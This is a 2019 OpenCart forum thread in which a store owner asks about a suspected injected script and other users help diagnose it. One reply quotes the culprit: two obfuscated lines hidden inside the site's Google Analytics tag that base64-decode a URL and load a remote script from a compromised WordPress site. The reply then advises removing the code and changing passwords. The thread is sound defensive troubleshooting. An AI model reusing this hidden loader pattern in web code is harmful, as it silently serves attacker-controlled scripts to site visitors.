OpenCart Community

OpenCart Community Forum - Discuss shopping cart and e-commerce solutions.
https://forum.opencart.com/

Potential malware or injected script on my site

https://forum.opencart.com/viewtopic.php?t=213189

Page 1 of 1

Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 8:40 pm
by rhorne
We run an online store, here: https://tinyurl.com/yxv2z9p4

Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js

See the below scan results for confirmation:

https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3

I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.

If anyone can shed any light I'd be very grateful.

Opencart 2.3.0.2. Journal 2 template.

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 9:13 pm
by IP_CAM
Well, this topic seems to have been cleared out already, but that's, what it takes
for Journal, to make an OpenCart Software work. :crazy: :choke:
Image
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so, better get a professional, because nobody else would be able or willing, to
assist in such an installation.
Good Luck ...
Ernie

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 10:16 pm
by rhorne
I'm confused. Your screenshot doesn't give me any clues. Yes there are lots of JS files but none of them that I can see link to that website.

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:01 pm
by IP_CAM
Well, I just wanted to point out, why so many don't like Journal Themes,
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:31 pm
by rhorne
Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:46 pm
by ADD Creative
It's these two lines of code. It's decoding the URL and then adding the script to the page.

Code: Select all

  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
It appears in you Google Analytics code.

Code: Select all

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

  gtag('js', new Date());

  gtag('config', 'UA-34406391-6');
</script>
You need to remove the code and fix your Google Analytics code. I would also recommend you check if your theme has and updates that may have security patches. Also change all your passwords, such as all OpenCart admin logins, all hosting control panel logins, all FTP account, etc.

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:49 pm
by Elevate
rhorne wrote:
Thu Aug 08, 2019 11:31 pm
 Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?
Even though you're not running a Wordpress site, this implies that there are still WP files uploded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 2:42 am
by IP_CAM
Hackers don't care whether or not you're actually running a WP site.
That's correct ! And hacking Attempts on OC Sites are not uncommon, I frequently
redirect such Calls, by use of a fine 1.5.x Extension, as you can see on the image below. :D
Ernie
---
Image

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 3:24 pm
by rhorne
Thanks for your replies guys. I'll update the Google Analytics code and themes etc and change all passwords immediately. :)

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 4:02 pm
by wrick0
Make sure your host has modsecurity installed which can block most of the sql attacks
All times are UTC+08:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/